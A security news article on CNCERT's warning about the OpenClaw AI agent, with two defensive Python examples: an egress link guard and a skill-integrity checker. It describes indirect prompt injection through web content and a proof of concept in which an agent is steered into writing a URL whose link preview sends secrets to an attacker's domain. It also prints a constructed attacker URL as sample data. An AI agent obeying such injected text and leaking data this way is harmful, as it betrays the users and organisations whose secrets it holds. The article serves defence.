CNCERT Warns OpenClaw Flaws Enable Prompt Injection and Data Theft
China’s National Computer Network Emergency Response Technical Team (CNCERT) warned that OpenClaw, an open-source self-hosted AI agent, ships with what it called “inherently weak default security configurations” and that its privileged access to systems could let attackers seize control of endpoints.
The core risk centers on prompt injection attacks. CNCERT described scenarios where malicious instructions hidden in web content trick an agent into revealing sensitive data. Security researchers call these indirect prompt injection attacks, or cross-domain prompt injection, because attackers abuse benign AI features like web summarization or content analysis rather than directly prompting a large language model.
OpenAI has also noted the growing risk. “AI agents are increasingly able to browse the web, retrieve information, and take actions on a user’s behalf,” OpenAI said. “Those capabilities are useful, but they also create new ways for attackers to try to manipulate the system.”
Concrete proof-of-concept attacks have emerged. Researchers at PromptArmor found that link preview features in messaging apps such as Telegram and Discord can be turned into an automatic data exfiltration channel when interacting with OpenClaw. PromptArmor explained that an agent can be manipulated to generate a URL that, when rendered as a preview, transmits confidential data to an attacker-controlled domain without any human clicking the link.
“This means that in agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link,” PromptArmor said. The finding shows how a standard convenience feature can become a high-risk path for leaking secrets.
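The preview-based exfiltration described above works because the agent's reply is rendered by a client that fetches every URL it contains. One defensive control is an egress guard that inspects an agent's outgoing text before it reaches such a client and strips links that point at hosts outside an allowlist or that carry secret-looking values in their query string, path or fragment. The following is an added example written for this article, not code from OpenClaw, PromptArmor or CNCERT; the allowlist, the sample reply and the length/entropy thresholds are constructed assumptions to be tuned per deployment.

```python
"""Egress guard for agent replies: remove links that could leak data via link previews.
Added example (not OpenClaw's own code); hosts, thresholds and the sample reply are constructed."""
import math
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Hypothetical allowlist of hosts the agent is permitted to link to (constructed for the example).
ALLOWED_HOSTS = {"docs.example.com", "github.com"}

# Matches http(s) URLs; trailing sentence punctuation is split off again in sanitize_agent_output.
URL_RE = re.compile(r"""https?://[^\s<>"'()\[\]]+""")
TRAILING_PUNCT = ".,;:!?"


def shannon_entropy(s: str) -> float:
    """Bits per character: encoded or random tokens score high, ordinary words score low."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_secret(value: str, min_len: int = 16, min_entropy: float = 3.5) -> bool:
    """Heuristic (assumed thresholds): long, high-entropy values are treated as possible smuggled data."""
    return len(value) >= min_len and shannon_entropy(value) >= min_entropy


def classify_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> list:
    """Return the reasons a URL is unsafe to emit; an empty list means it passes."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host not in allowed_hosts:
        reasons.append("host-not-allowlisted")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if looks_like_secret(value):
            reasons.append(f"high-entropy-param:{key}")
    # Data can also be smuggled in path segments or the fragment, not only in query parameters.
    for segment in parts.path.split("/") + [parts.fragment]:
        if looks_like_secret(segment):
            reasons.append("high-entropy-path-or-fragment")
            break
    return reasons


def sanitize_agent_output(text: str, allowed_hosts=ALLOWED_HOSTS):
    """Replace unsafe links before the reply reaches a client that auto-previews URLs.
    Returns (sanitized_text, findings), where findings is a list of (url, reasons) for review."""
    findings = []

    def repl(match):
        raw = match.group(0)
        url = raw.rstrip(TRAILING_PUNCT)   # keep the sentence's punctuation out of the URL
        tail = raw[len(url):]
        reasons = classify_url(url, allowed_hosts)
        if not reasons:
            return raw
        findings.append((url, reasons))
        host = urlsplit(url).hostname or "?"
        return f"[link to {host} removed by egress guard]{tail}"

    return URL_RE.sub(repl, text), findings


# Constructed sample: a reply in which an injected page has coaxed the agent into embedding
# an encoded value in a query string bound for an unapproved host.
SAMPLE_REPLY = (
    "Here is the setup guide: https://docs.example.com/guide?page=intro. "
    "Also see https://collector.attacker.example/p?d=0123456789abcdefABCDEF for details."
)

if __name__ == "__main__":
    clean, hits = sanitize_agent_output(SAMPLE_REPLY)
    print(clean)
    for blocked_url, why in hits:
        print("BLOCKED", blocked_url, why)
```

The guard is deliberately placed on the output side: it does not try to recognise the injected instruction in the fetched page (which is unreliable), it limits what a compromised reply can do once it exists. Findings should be logged, since a blocked link is itself a signal that an injection may have succeeded upstream.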
CNCERT listed additional concerns beyond prompt injection: the agent might misinterpret instructions and accidentally delete critical data; threat actors could upload malicious skills to community repositories like ClawHub that run arbitrary commands; and known security vulnerabilities in OpenClaw could be used to compromise systems and leak information.
CNCERT cautioned that for sectors such as finance and energy those failures could be severe. “For critical sectors such as finance and energy such breaches could lead to the leakage of core business data, trade secrets, and code repositories, or even result in the complete paralysis of entire business systems, causing incalculable losses,” the agency said.
To mitigate risk, CNCERT advised organizations to strengthen network controls, avoid exposing OpenClaw’s default management port to the internet, run the agent in an isolated container, never store credentials in plaintext, only install skills from trusted channels, disable automatic skill updates, and keep the agent patched.
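Two of the points above, the risk of malicious skills uploaded to community repositories and the advice to disable automatic skill updates, come down to the same control: pin what was reviewed and refuse to run anything that has changed since. The following added example (written for this article, not OpenClaw's or ClawHub's own tooling) records a SHA-256 manifest of a reviewed skill directory and later detects files that were modified, removed or silently added; the skill layout and file contents are constructed.

```python
"""Pin-and-verify check for community skills (added example; skill layout is constructed)."""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large skill bundles do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(skill_dir: Path) -> dict:
    """Hash every file under the reviewed skill directory, keyed by POSIX-style relative path."""
    return {
        p.relative_to(skill_dir).as_posix(): sha256_file(p)
        for p in sorted(skill_dir.rglob("*"))
        if p.is_file()
    }


def verify_skill(skill_dir: Path, pinned: dict) -> list:
    """Compare the on-disk skill with the pinned manifest. Returns sorted problems; empty means OK."""
    current = build_manifest(skill_dir)
    problems = []
    for rel, digest in pinned.items():
        if rel not in current:
            problems.append(f"missing: {rel}")
        elif current[rel] != digest:
            problems.append(f"modified: {rel}")
    for rel in current:
        if rel not in pinned:
            problems.append(f"unexpected: {rel}")
    return sorted(problems)


def demo() -> tuple:
    """Constructed scenario: pin a reviewed skill, then catch an unreviewed 'update' that altered it."""
    with tempfile.TemporaryDirectory() as tmp:
        skill = Path(tmp) / "weather-skill"          # hypothetical skill name
        skill.mkdir()
        (skill / "skill.json").write_text('{"name": "weather", "version": "1.0.0"}\n')
        (skill / "run.py").write_text("print('sunny')\n")
        pinned = build_manifest(skill)               # what the reviewer approved
        before = verify_skill(skill, pinned)         # expected: no problems
        # Simulate an automatic update that rewrote run.py and added a file nobody reviewed.
        (skill / "run.py").write_text("print('cloudy')  # changed after review\n")
        (skill / "helper.py").write_text("pass\n")
        after = verify_skill(skill, pinned)
    return before, after


if __name__ == "__main__":
    ok, broken = demo()
    print("after review:", ok or "clean")
    print("after unreviewed update:", json.dumps(broken, indent=2))
```

In practice the pinned manifest lives outside the skill directory (for example in version control next to the deployment config) and the verify step runs before every agent start, so that a skill which drifted from its reviewed state is refused rather than loaded.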
Threat actors have already capitalized on OpenClaw’s popularity. Security firm Huntress reported malicious GitHub repositories posing as OpenClaw installers that distributed information stealers and proxy malware. Huntress said the campaign broadly targeted users trying to install OpenClaw and succeeded in part because the malicious repositories were hosted on GitHub and ranked highly in AI-driven search suggestions.
Bloomberg reported that Chinese authorities have moved to restrict state-run enterprises and government agencies from running OpenClaw apps on office machines as a precaution, and that the ban reportedly extends to families of military personnel.
OpenClaw users and administrators should treat agent deployments like any other networked service: assume internet-exposed features can be weaponized, limit privileges, and follow CNCERT and vendor guidance to reduce attack surface and the risk of data loss.
For practical guidance on preventing and mitigating prompt injection in agentic systems, see mitigating prompt injection attacks.